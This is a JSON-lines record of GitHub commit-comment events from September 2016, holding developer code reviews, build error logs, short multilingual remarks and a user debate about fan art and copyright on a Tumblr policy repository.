{"id":"4579265950","type":"CommitCommentEvent","actor":{"login":"feross"},"repo":{"name":"feross/webtorrent-www"},"payload":{"comment":{"id":19069108,"position":30,"line":235,"path":"server/desktop-api.js","commit_id":"eb63b82de683c9b1236190bcba93da9f2136d9d5","created_at":"2016-09-18T05:15:39Z","updated_at":"2016-09-18T05:15:39Z","body":"RELEASES-ia32 is the name of the 32-bit release file, to distinguish it from RELEASES. Here are the new Windows build artifacts:\r\n\r\n<img width=\"760\" alt=\"screen shot 2016-09-17 at 10 14 30 pm\" src=\"https://cloud.githubusercontent.com/assets/121766/18613025/3ba3f222-7d24-11e6-8490-2b77ff3658d7.png\">\r\n"}},"created_at":"2016-09-18T05:15:39Z"}
{"id":"4579266190","type":"CommitCommentEvent","actor":{"login":"thomasjinlo"},"repo":{"name":"thomasjinlo/data-structures"},"payload":{"comment":{"id":19069109,"position":null,"line":null,"path":null,"commit_id":"0148acfccd74c3d1c13145c083faac63e25f0d7d","created_at":"2016-09-18T05:15:51Z","updated_at":"2016-09-18T05:15:51Z","body":"`nodeProto // {isEmpty: false}`\r\nOriginally was using `Object.assign(Object.create(nodeProto, Node(value, currentNode.next));` to set `nodeProto` as the new Node's prototype, but instead was modifying the `nodeProto` with the new properties of the Node, and setting new Node to reference the `nodeProto` object creating a circular list.\r\n\r\nFirst fix was using an anonymous object's property for the prototype, but noticed the inefficiency. It was also going against the reason why I'm trying to use a prototype in the first place.\r\n\r\nFinal fix. Use `Object.setPrototypeOf(Node(value, next), protoNode)` instead. It will allow me to reference each new Node's prototype to the `protoNode` object without modifying it, and also not referencing it directly."}},"created_at":"2016-09-18T05:15:51Z"}
{"id":"4579266284","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"diamond-gold/MiniBosses"},"payload":{"comment":{"id":19069111,"position":null,"line":null,"path":null,"commit_id":"3a3564d2fbd2c97478ff761265239e77ea590953","created_at":"2016-09-18T05:15:57Z","updated_at":"2016-09-18T05:15:57Z","body":"Yup I got the same problem ^"}},"created_at":"2016-09-18T05:15:57Z"}
{"id":"4579267809","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19069117,"position":7,"line":11,"path":"linkedList/src/test/java/com/spark/collection/LinkedListTest.java","commit_id":"dc6bb7d7a937df38f6c55783b7f53d7ef32ba577","created_at":"2016-09-18T05:17:37Z","updated_at":"2016-09-18T05:17:37Z","body":"not really required"}},"created_at":"2016-09-18T05:17:37Z"}
{"id":"4579268502","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19069119,"position":3,"line":3,"path":"linkedList/src/main/java/com/spark/collection/LinkedList.java","commit_id":"dc6bb7d7a937df38f6c55783b7f53d7ef32ba577","created_at":"2016-09-18T05:18:19Z","updated_at":"2016-09-18T05:18:19Z","body":"Better name ``Node``"}},"created_at":"2016-09-18T05:18:19Z"}
{"id":"4579272477","type":"CommitCommentEvent","actor":{"login":"jj870la"},"repo":{"name":"chanlee514/incubator-predictionio"},"payload":{"comment":{"id":19069121,"position":null,"line":null,"path":null,"commit_id":"a9abd7514abf3e6f7013a2398247c20fbcf2562d","created_at":"2016-09-18T05:22:09Z","updated_at":"2016-09-18T05:22:09Z","body":" <4.3>"}},"created_at":"2016-09-18T05:22:09Z"}
{"id":"4579272497","type":"CommitCommentEvent","actor":{"login":"1985CHAIKINA"},"repo":{"name":"1985CHAIKINA/---"},"payload":{"comment":{"id":19069122,"position":null,"line":null,"path":null,"commit_id":"ce25a11bbaf2ccae0b05c04c4f836353d4cfa87c","created_at":"2016-09-18T05:22:10Z","updated_at":"2016-09-18T05:22:10Z","body":"Привет"}},"created_at":"2016-09-18T05:22:10Z"}
{"id":"4579272840","type":"CommitCommentEvent","actor":{"login":"harpocrates"},"repo":{"name":"jameysharp/corrode"},"payload":{"comment":{"id":19069124,"position":null,"line":null,"path":null,"commit_id":"7c4e803cf5295dff46221da48e8e607cb656891e","created_at":"2016-09-18T05:22:33Z","updated_at":"2016-09-18T05:22:33Z","body":"While I understand the motivation for the solution implemented, I don't think it is a good idea in the long run and I think the alternative is at least worth mentioning: why don't we instead just make `zeroInitializer` return an `Initializer`?\r\n\r\nGiven we have `#[repr(i32)]` tacked onto our enums, I think initializing them with `0i32` even now is a very reasonable thing to do for the moment. That leaves only the problem of incomplete types, for which I admit I don't yet have a solution.\r\n\r\nHowever, consider what happens if  `zeroInitializer :: CType -> Initializer`\r\n  * we leave open the possibility of eventually using `zeroInitializer` for static variables (which is pretty much closed off after this commit)\r\n  * this whole problem becomes a non-issue provided our `mappend` of initializers is lazy enough (as the alternative one in [this commit](https://github.com/jameysharp/corrode/pull/63/commits/d7926d7f24a0d78a786860b166586e3a6d4f0d9d) is) - we don't even check the zero initializer if our initializer obviously overrides it)"}},"created_at":"2016-09-18T05:22:33Z"}
{"id":"4579276064","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"IndoorPosSquad/dw1000_firmware"},"payload":{"comment":{"id":19069137,"position":null,"line":null,"path":null,"commit_id":"6f95c18a4c5612d40e12ed5bcb1dcc09b1355b5d","created_at":"2016-09-18T05:25:40Z","updated_at":"2016-09-18T05:25:40Z","body":"Thanks for reply...but I am not sure about Interrupt and Reset pin of DW1000 to connect with which pin of pixhawk."}},"created_at":"2016-09-18T05:25:40Z"}
{"id":"4579277949","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"IndoorPosSquad/dw1000_firmware"},"payload":{"comment":{"id":19069145,"position":null,"line":null,"path":null,"commit_id":"6f95c18a4c5612d40e12ed5bcb1dcc09b1355b5d","created_at":"2016-09-18T05:27:20Z","updated_at":"2016-09-18T05:27:20Z","body":"Kindly if you have DW1000 with ARM cortex M4 (or if M3) pin connections then pass it to me...My email address is ajuvbhatt03@gmail.com"}},"created_at":"2016-09-18T05:27:20Z"}
{"id":"4579278675","type":"CommitCommentEvent","actor":{"login":"Alilotffar"},"repo":{"name":"Alilotffar/Alilotfifar_bot"},"payload":{"comment":{"id":19069147,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-18T05:27:55Z","updated_at":"2016-09-18T05:27:55Z","body":"233546271"}},"created_at":"2016-09-18T05:27:55Z"}
{"id":"4579279083","type":"CommitCommentEvent","actor":{"login":"MuhammadSyamsul"},"repo":{"name":"MuhammadSyamsul/learning"},"payload":{"comment":{"id":19069149,"position":null,"line":null,"path":null,"commit_id":"d171794b0e835f265f3a60d855f8ed0fb3afde5a","created_at":"2016-09-18T05:28:15Z","updated_at":"2016-09-18T05:28:15Z","body":"pak samsul "}},"created_at":"2016-09-18T05:28:15Z"}
{"id":"4579281409","type":"CommitCommentEvent","actor":{"login":"bokatan"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":19069161,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-18T05:30:24Z","updated_at":"2016-09-18T05:30:24Z","body":"Sorry, Aidan-fitz, re-read the statues that vary state to state and the copyright laws in place. Most people do not have commissions from other distribution companies (those that make movies and television and comics) to allow any derivitization that makes a DEMAND for an attribution for the said work. You cannot take \"Mickey Mouse\" and create whatever art you want and sell it on a T-shirt throughout social media without Disney's approval. Even if you change the color of the ears or the part where is mouth. It's NOT a derivtive, it's STOLEN. Because that character is Trademarked under a corporation. Most distribution companies trademark their material, not just copyright, but trademark, too. For a fan artist to demand then report to Tumblr about their fan art being stolen by someone who posts is a lie."}},"created_at":"2016-09-18T05:30:24Z"}
{"id":"4579281865","type":"CommitCommentEvent","actor":{"login":"aulialigar"},"repo":{"name":"aulialigar/Form"},"payload":{"comment":{"id":19069162,"position":null,"line":null,"path":null,"commit_id":"4558f290b8a4201ea976d3d6c9163113dc27ae21","created_at":"2016-09-18T05:30:50Z","updated_at":"2016-09-18T05:30:50Z","body":"Link download https://drive.google.com/drive/folders/0BwN-jhmD0bOOSlVDelNXa0NaZE0\r\n![image](https://cloud.githubusercontent.com/assets/22268453/18613074/925f9144-7d9b-11e6-853d-99d1c7778760.png)\r\n![image](https://cloud.githubusercontent.com/assets/22268453/18613076/a30f67a8-7d9b-11e6-99fa-1a95ba93932f.png)\r\n![image](https://cloud.githubusercontent.com/assets/22268453/18613078/b8eccc50-7d9b-11e6-90fc-1e027877c730.png)\r\n\r\n"}},"created_at":"2016-09-18T05:30:50Z"}
{"id":"4579286168","type":"CommitCommentEvent","actor":{"login":"Alilotffar"},"repo":{"name":"Alilotffar/Alilotfifar_bot"},"payload":{"comment":{"id":19069170,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-18T05:34:51Z","updated_at":"2016-09-18T05:34:51Z","body":" 233546271"}},"created_at":"2016-09-18T05:34:51Z"}
{"id":"4579286250","type":"CommitCommentEvent","actor":{"login":"jonsgold"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":19069171,"position":null,"line":null,"path":null,"commit_id":"c3eb0aaf16f5635cc71a7197a1b1ed1421002929","created_at":"2016-09-18T05:34:56Z","updated_at":"2016-09-18T05:34:56Z","body":"@TorsteinHonsi +1. What is the timeline for v4.2.7?"}},"created_at":"2016-09-18T05:34:56Z"}
{"id":"4579286721","type":"CommitCommentEvent","actor":{"login":"Alilotffar"},"repo":{"name":"Alilotffar/Alilotfifar_bot"},"payload":{"comment":{"id":19069173,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-18T05:35:22Z","updated_at":"2016-09-18T05:35:22Z","body":" 233546271\r\n"}},"created_at":"2016-09-18T05:35:22Z"}
{"id":"4579289941","type":"CommitCommentEvent","actor":{"login":"coskuntekin"},"repo":{"name":"bulutfon/apsiyon"},"payload":{"comment":{"id":19069178,"position":null,"line":null,"path":null,"commit_id":"c2fc3d3d6936957e41bd88b4281323de280c04df","created_at":"2016-09-18T05:38:27Z","updated_at":"2016-09-18T05:38:27Z","body":"merge develop"}},"created_at":"2016-09-18T05:38:27Z"}
{"id":"4579291084","type":"CommitCommentEvent","actor":{"login":"Alilotffar"},"repo":{"name":"Alilotffar/Alilotfifar_bot"},"payload":{"comment":{"id":19069184,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-18T05:39:35Z","updated_at":"2016-09-18T05:39:35Z","body":"@Ali_lotfifar"}},"created_at":"2016-09-18T05:39:35Z"}
{"id":"4579291299","type":"CommitCommentEvent","actor":{"login":"Alilotffar"},"repo":{"name":"Alilotffar/Alilotfifar_bot"},"payload":{"comment":{"id":19069186,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-18T05:39:47Z","updated_at":"2016-09-18T05:39:47Z","body":"@Ali_lotfifar"}},"created_at":"2016-09-18T05:39:47Z"}
{"id":"4579291807","type":"CommitCommentEvent","actor":{"login":"apemanzilla"},"repo":{"name":"Lignumm/CCEmuX"},"payload":{"comment":{"id":19069187,"position":null,"line":null,"path":null,"commit_id":"cba40a52ceca0627cd0e61f2fb7074bc4afb0cbe","created_at":"2016-09-18T05:40:14Z","updated_at":"2016-09-18T05:40:14Z","body":"@Lignumm You can now create a `ccemux.properties` file in the project folder (alongside `build.gradle`) with properties such as `termScale = 2` and `termWidth=102`"}},"created_at":"2016-09-18T05:40:14Z"}
{"id":"4579292174","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"Fsu0413/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":19069189,"position":null,"line":null,"path":null,"commit_id":"3220a0e069178022e0a921401692fa534d67b429","created_at":"2016-09-18T05:40:34Z","updated_at":"2016-09-18T05:40:34Z","body":"不知道个毛线。。。。提交完了编译不过不是你的问题么"}},"created_at":"2016-09-18T05:40:34Z"}
{"id":"4579296077","type":"CommitCommentEvent","actor":{"login":"ruggertech"},"repo":{"name":"gonenduk/basejs"},"payload":{"comment":{"id":19069195,"position":null,"line":null,"path":null,"commit_id":"e588a9961e01554a83610e1634af0410ad46826e","created_at":"2016-09-18T05:44:17Z","updated_at":"2016-09-18T05:44:17Z","body":"should you not write a log so that if some functionality is missing you'll know the reason?"}},"created_at":"2016-09-18T05:44:17Z"}
{"id":"4579296080","type":"CommitCommentEvent","actor":{"login":"DVSB"},"repo":{"name":"lxcenter/kloxo"},"payload":{"comment":{"id":19069196,"position":null,"line":null,"path":null,"commit_id":"b62c08e43f9b3169a374be896eb523cb1161b832","created_at":"2016-09-18T05:44:18Z","updated_at":"2016-09-18T05:44:18Z","body":"i have to login screen: \r\n\r\nNotice: Undefined offset: 0 in /usr/local/lxlabs/kloxo/httpdocs/lib/sgbl.php on line 101\r\nWarning: exec(): Unable to fork [rpm -qa qmail-toaster] in /usr/local/lxlabs/kloxo/httpdocs/lib/sgbl.php on line 100\r\n\r\nNotice: Undefined offset: 0 in /usr/local/lxlabs/kloxo/httpdocs/lib/sgbl.php on line 101\r\n   admin — {Password} Help - Add to Favorites \t\r\nLogin as 'admin' — Click 'Help' for more info \r\n\r\nFatal error: Call to undefined function print_tab_block_start() in /usr/local/lxlabs/kloxo/httpdocs/theme/htmllib.php on line 366"}},"created_at":"2016-09-18T05:44:18Z"}
{"id":"4579298336","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19069200,"position":null,"line":null,"path":null,"commit_id":"6ec8ab226952240de5c8cf54ef7681d5d159aa8e","created_at":"2016-09-18T05:46:29Z","updated_at":"2016-09-18T05:46:29Z","body":"Don't worry about. Let's keep it simple, it's an rear event."}},"created_at":"2016-09-18T05:46:29Z"}
{"id":"4579303413","type":"CommitCommentEvent","actor":{"login":"jameysharp"},"repo":{"name":"jameysharp/corrode"},"payload":{"comment":{"id":19069214,"position":null,"line":null,"path":null,"commit_id":"7c4e803cf5295dff46221da48e8e607cb656891e","created_at":"2016-09-18T05:51:13Z","updated_at":"2016-09-18T05:51:13Z","body":"Hmm, interesting question. I did consider trying to just make everything sufficiently lazy, but if even one case in `zeroInitializer` needs to be able to report errors, then I'm not seeing any reasonable way to take advantage of laziness.\r\n\r\nAnd no, we can't assign an arithmetic type to an enum in Rust, unless you know something I don't. So I think we're guaranteed to have error cases around enums no matter what we do.\r\n\r\nFortunately, initializing static variables is no harder now than it was before, because you can call `interpretInitializer` with an empty `CInitList` and it will always do the right thing. The only challenge is finding the simplest way to indicate whether a variable needs that treatment, or should be left uninitialized. See the implementation of static variables in `interpretDeclarations`, which does that already; it's only non-static globals that aren't being initialized correctly right now.\r\n\r\nAlso, I think this version is close enough to identical to the previous one that I feel the level of conceptual complexity is just about right.\r\n\r\nSo I don't really feel we've lost anything with this change, and I'm inclined to keep it. Thank you for reviewing it though!"}},"created_at":"2016-09-18T05:51:13Z"}
{"id":"4579304397","type":"CommitCommentEvent","actor":{"login":"libingfengWP"},"repo":{"name":"bf-wang/wp"},"payload":{"comment":{"id":19069218,"position":null,"line":null,"path":null,"commit_id":"12fd64ddf9a245ebdea0e1f18483ac2cf3b5ec64","created_at":"2016-09-18T05:52:08Z","updated_at":"2016-09-18T05:52:08Z","body":"123"}},"created_at":"2016-09-18T05:52:08Z"}
{"id":"4579306372","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069229,"position":null,"line":null,"path":null,"commit_id":"22cd370c89f25356b9f06ebe878a05f3ec4e3124","created_at":"2016-09-18T05:53:54Z","updated_at":"2016-09-18T05:53:54Z","body":"das war alles auf feed schon was macht ihr hier für ein chaos, nun fehlen die files schon wieder, ändere das sofort wieder"}},"created_at":"2016-09-18T05:53:54Z"}
{"id":"4579308770","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069257,"position":null,"line":null,"path":null,"commit_id":"f5b1a899160955635ee328391243d9f77af58da2","created_at":"2016-09-18T05:55:53Z","updated_at":"2016-09-18T05:55:53Z","body":" super , alle images bauen nicht mehr\r\n\r\n| mipsel-oe-linux-ranlib ../libssl.a || echo Never mind.\r\n| make[1]: Leaving directory `/home/oe1/nightly53/build-enviroment/builds/openatv/release/vuuno/tmp/work/mips32el-oe-linux/openssl-old/0.9.8x-r17.0/openssl-0.9.8x/ssl'\r\n| ERROR: oe_runmake failed\r\n| ERROR: Function failed: do_compile (log file is located at /home/oe1/nightly53/build-enviroment/builds/openatv/release/vuuno/tmp/work/mips32el-oe-linux/openssl-old/0.9.8x-r17.0/temp/log.do_compile.2426)\r\nNOTE: recipe openssl-old-0.9.8x-r17.0: task do_compile: Failed"}},"created_at":"2016-09-18T05:55:53Z"}
{"id":"4579310090","type":"CommitCommentEvent","actor":{"login":"harpocrates"},"repo":{"name":"jameysharp/corrode"},"payload":{"comment":{"id":19069262,"position":null,"line":null,"path":null,"commit_id":"7c4e803cf5295dff46221da48e8e607cb656891e","created_at":"2016-09-18T05:56:57Z","updated_at":"2016-09-18T05:56:57Z","body":"Ah I see. I forgot that Rust doesn't accept arithmetic types for its enums - I was only thinking about the C side of things.\r\n\r\nYeah, I guess the number of things on the side of keeping `zeroInitializer` inside `EnvMonad` is just too great... :) Thanks for the quick answer / explanation by the way!"}},"created_at":"2016-09-18T05:56:57Z"}
{"id":"4579310367","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069263,"position":null,"line":null,"path":null,"commit_id":"48adbb4ad64dc18db1d4197d1a3b7de4292f8199","created_at":"2016-09-18T05:57:12Z","updated_at":"2016-09-18T05:57:12Z","body":"das ready ipk wird nicht gebaut 3rd party darum kannst das nicht einfach mal so ändern"}},"created_at":"2016-09-18T05:57:12Z"}
{"id":"4579312070","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069268,"position":null,"line":null,"path":null,"commit_id":"48adbb4ad64dc18db1d4197d1a3b7de4292f8199","created_at":"2016-09-18T05:58:27Z","updated_at":"2016-09-18T05:58:27Z","body":"Wie gesagt, dann hauen wir die Files einfach wieder in python-twisted-core mit rein.\r\nSplitten in ein neues Paket macht aber keinen Sinn, wenn man das neue Paket dann über RDEPEND eh immer ausliefert."}},"created_at":"2016-09-18T05:58:27Z"}
{"id":"4579312259","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"domonmizuki/ToDoList2"},"payload":{"comment":{"id":19069269,"position":null,"line":null,"path":null,"commit_id":"1661a40531a6b8aaa52e602eb9aafac80ee64535","created_at":"2016-09-18T05:58:37Z","updated_at":"2016-09-18T05:58:37Z","body":"👍"}},"created_at":"2016-09-18T05:58:37Z"}
{"id":"4579313221","type":"CommitCommentEvent","actor":{"login":"jxxyyang"},"repo":{"name":"jxxyyang/Myblog"},"payload":{"comment":{"id":19069271,"position":null,"line":null,"path":null,"commit_id":"b29780d80a09acb88e09087f729f11cb3dbef6a9","created_at":"2016-09-18T05:59:25Z","updated_at":"2016-09-18T05:59:25Z","body":"# 我的博客\r\n**test**"}},"created_at":"2016-09-18T05:59:25Z"}
{"id":"4579317893","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069318,"position":null,"line":null,"path":null,"commit_id":"48adbb4ad64dc18db1d4197d1a3b7de4292f8199","created_at":"2016-09-18T06:02:24Z","updated_at":"2016-09-18T06:02:24Z","body":"jo sehe ich auch so"}},"created_at":"2016-09-18T06:02:24Z"}
{"id":"4579317964","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"MoKee/android_kernel_zuk_msm8996"},"payload":{"comment":{"id":19069319,"position":null,"line":null,"path":null,"commit_id":"6858e9f6831ad9b6d3670a85f724bf26bda0475e","created_at":"2016-09-18T06:02:28Z","updated_at":"2016-09-18T06:02:28Z","body":"Commit title is not appropriate, instead of just 'update' please also add some notes or 'update for blah blah blah Fus-Ro-Dah...'"}},"created_at":"2016-09-18T06:02:28Z"}
{"id":"4579321172","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069327,"position":null,"line":null,"path":null,"commit_id":"48adbb4ad64dc18db1d4197d1a3b7de4292f8199","created_at":"2016-09-18T06:04:34Z","updated_at":"2016-09-18T06:04:34Z","body":"Done:\r\nhttps://github.com/oe-alliance/oe-alliance-core/commit/9e89afb19354cf9df3718ead0a5ac7e1621ba3a2\r\n"}},"created_at":"2016-09-18T06:04:34Z"}
{"id":"4579323363","type":"CommitCommentEvent","actor":{"login":"bamzibahal"},"repo":{"name":"bamzibahal/bamzi"},"payload":{"comment":{"id":19069336,"position":null,"line":null,"path":null,"commit_id":"2fce642d319b539cff033461e3decd7536c76824","created_at":"2016-09-18T06:06:20Z","updated_at":"2016-09-18T06:06:20Z","body":"how can config reame.md file?"}},"created_at":"2016-09-18T06:06:20Z"}
{"id":"4579326619","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"ResurrectionRemix/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":19069339,"position":null,"line":null,"path":null,"commit_id":"3ee0f8179a4eec89679fefd4c2ae1ad970c89457","created_at":"2016-09-18T06:08:57Z","updated_at":"2016-09-18T06:08:57Z","body":"@varund7726  why deleted Nougat branch from all repo's ?\r\nsorry to comment on commit i will delete it after you answer"}},"created_at":"2016-09-18T06:08:57Z"}
{"id":"4579327115","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"dotnet/cli"},"payload":{"comment":{"id":19069341,"position":null,"line":null,"path":null,"commit_id":"1626cf2e62b3603d8b6610864420dae471b61d53","created_at":"2016-09-18T06:09:25Z","updated_at":"2016-09-18T06:09:25Z","body":"👏 "}},"created_at":"2016-09-18T06:09:25Z"}
{"id":"4579329286","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/skins"},"payload":{"comment":{"id":19069348,"position":null,"line":null,"path":null,"commit_id":"369a1f29e86f9ca6fa49db652dd056a1f6079891","created_at":"2016-09-18T06:11:05Z","updated_at":"2016-09-18T06:11:05Z","body":"This is how it looks like in Magic-FHD:\r\n![magic-radio-2](https://cloud.githubusercontent.com/assets/1040294/18613261/21e17488-7d77-11e6-82d2-0c82fbeb7f25.jpg)\r\n![magic-radio-1](https://cloud.githubusercontent.com/assets/1040294/18613262/21e72d06-7d77-11e6-837c-c6b03affc84f.jpg)\r\nOf course this is just an example, but anyhow: in the screen lay-out one has to take into account that \"RadioInfoBar\" is always overlaying \"ChannelSelectionRadio\", so both screens have to be adapted to that."}},"created_at":"2016-09-18T06:11:05Z"}
{"id":"4579331443","type":"CommitCommentEvent","actor":{"login":"ALIRAQI"},"repo":{"name":"ALIRAQI/platform_frameworks_base"},"payload":{"comment":{"id":19069353,"position":null,"line":null,"path":null,"commit_id":"c667149326a36a4b8057ba229cfe9c2febd4ac7c","created_at":"2016-09-18T06:12:53Z","updated_at":"2016-09-18T06:12:53Z","body":"unlink it from \"batterymeter_frame_color\" which is statusbar battery icon color :p "}},"created_at":"2016-09-18T06:12:53Z"}
{"id":"4579332482","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19069356,"position":679,"line":679,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T06:13:44Z","updated_at":"2016-09-18T06:13:44Z","body":"conf对象从哪里获得的，作用域链是不是太长了"}},"created_at":"2016-09-18T06:13:44Z"}
{"id":"4579333885","type":"CommitCommentEvent","actor":{"login":"aidan-fitz"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":19069360,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-18T06:14:52Z","updated_at":"2016-09-18T06:14:52Z","body":"Read what I said again. I did not claim that fan artists own the characters they're making fan art of. I said the exact opposite. With fan art, there are two (or more) copyrights at work. One for the character. The other for the art itself.\r\n\r\n> It's NOT a derivtive [sic], it's STOLEN.\r\n\r\nThat's \"the same thing,\" because the owner of the original character has the exclusive right to create derivative works of it. If fair use didn't apply, the person who made the fan art would be violating that right. (I prefer not to describe copyright infringement as \"theft.\" It's more like trespassing. But I digress.)\r\n\r\n> For a fan artist to demand then report to Tumblr about their fan art being stolen by someone who posts is a lie.\r\n\r\nIt's \"hypocritical\" for someone to commit copyright infringement and then accuse someone else of infringing their copyrights. However, as I'm about to argue, fan art generally does not violate copyright.\r\n\r\nUnder [17 U.S.C. § 107](https://www.law.cornell.edu/uscode/text/17/107), a court may determine whether or not the fair use exemption applies based on:\r\n> 1. the purpose and character of the use, including whether such use is of a commercial nature or is for nonprofit educational purposes;\r\n> 2. the nature of the copyrighted work;\r\n> 3. the amount and substantiality of the portion used in relation to the copyrighted work as a whole; and\r\n> 4. the effect of the use upon the potential market for or value of the copyrighted work.\r\n\r\nBased on item 4, fair use is more likely to apply if the use does not harm the original creator's ability to commercialize their work. As you previously stated, \r\n> All the FAN did is help the distribution and production companies and that's more marketing dollars for them\r\n\r\nBecause it's free advertising, fan art actually _helps_ content creators commercialize their work. Therefore, it's more likely to qualify as fair use.\r\n\r\nAs for your point about trademarks: I don't know as much about trademark law. [Wikipedia says](https://en.wikipedia.org/wiki/Legal_issues_with_fan_fiction#Trademark_law):\r\n> Common factors that may be relevant to fanfiction include:\r\n> 1. How well known and distinctive the mark allegedly being infringed is;\r\n> 2. How similar the infringing mark is to the original mark;\r\n> 3. How similar the allegedly infringing goods or services are to the markholder’s goods or services;\r\n> 4. Whether the infringer intended to deceive the purchasing public or to trade on the good will of the markholder;\r\n> 5. The level of sophistication of those persons or groups likely to be the consumers of the mark;\r\n> 6. Whether consumers were actually confused as to the source of the goods or services.\r\n> The courts can weigh the factors in individual cases, and may consider additional factors as they please.\r\n> To the extent that fanfiction uses source-identifying characters, settings and such, the marks are often well known are identical to the original, and are used in similar types of goods (i.e., written fiction). In this way, the first three factors relayed here weigh for the trademark holder.\r\n> **However, fanfiction writers generally do not intend to deceive the consuming public as to the source of the work, and often include prominent disclaimers at the outset of their works stating that the works are not the products of the original creators, both to honor the original creator and to prevent any possible confusion as to source. In addition, as a consuming audience, fanfiction readers are generally sophisticated regarding works' status as fanfiction, and are aware that fanfiction is not written or endorsed by those who hold the trademarks. As such, the last three factors tend to weigh in the direction of fanfiction writers.**\r\n\r\nThat's the legal theory. In practice, most content creators have moved towards tolerating fan art more, because it helps their sales and because it would not be cost-effective to go after fan artists. Some authors still dislike fan fiction of their work, but fans usually respect their wishes.\r\n\r\n**Disclaimer:** _I am not a lawyer_; the above is just my opinion and is _not legal advice_."}},"created_at":"2016-09-18T06:14:52Z"}
{"id":"4579334016","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069361,"position":null,"line":null,"path":null,"commit_id":"48adbb4ad64dc18db1d4197d1a3b7de4292f8199","created_at":"2016-09-18T06:14:58Z","updated_at":"2016-09-18T06:14:58Z","body":"Mal sehen, ob dann übermorgen jemand um die Ecke kommt und python-twisted-protocols-haproxy (Einen Load-Balancing Proxy!!!) braucht. ;)\r\n\r\n"}},"created_at":"2016-09-18T06:14:58Z"}
{"id":"4579335078","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19069366,"position":732,"line":732,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T06:15:52Z","updated_at":"2016-09-18T06:15:52Z","body":"每次循环都会重绘一次页面，性能会有问题"}},"created_at":"2016-09-18T06:15:52Z"}
{"id":"4579336369","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_kernel_xiaomi_aries"},"payload":{"comment":{"id":19069370,"position":null,"line":null,"path":null,"commit_id":"c2ddb7302779e14255d4c542a08630e2fc4f2d6a","created_at":"2016-09-18T06:16:59Z","updated_at":"2016-09-18T06:16:59Z","body":" @werty100  this commit Fix potential problems"}},"created_at":"2016-09-18T06:16:59Z"}
{"id":"4579336573","type":"CommitCommentEvent","actor":{"login":"roblav96"},"repo":{"name":"NativeScript/ios-runtime"},"payload":{"comment":{"id":19069372,"position":null,"line":null,"path":null,"commit_id":"62da395bc56f24e6ddeb34263129e23359006416","created_at":"2016-09-18T06:17:09Z","updated_at":"2016-09-18T06:17:09Z","body":"This might be related to https://github.com/NativeScript/NativeScript/issues/2750"}},"created_at":"2016-09-18T06:17:09Z"}
{"id":"4579337060","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069374,"position":7,"line":7,"path":"src/game.c","commit_id":"9f4e8921b58544da36a02ab4d53d552f0b267510","created_at":"2016-09-18T06:17:36Z","updated_at":"2016-09-18T06:17:36Z","body":"No need to set it `NULL` here, cuz you're setting it to the result of `SDL_CreateWindow` right..."}},"created_at":"2016-09-18T06:17:36Z"}
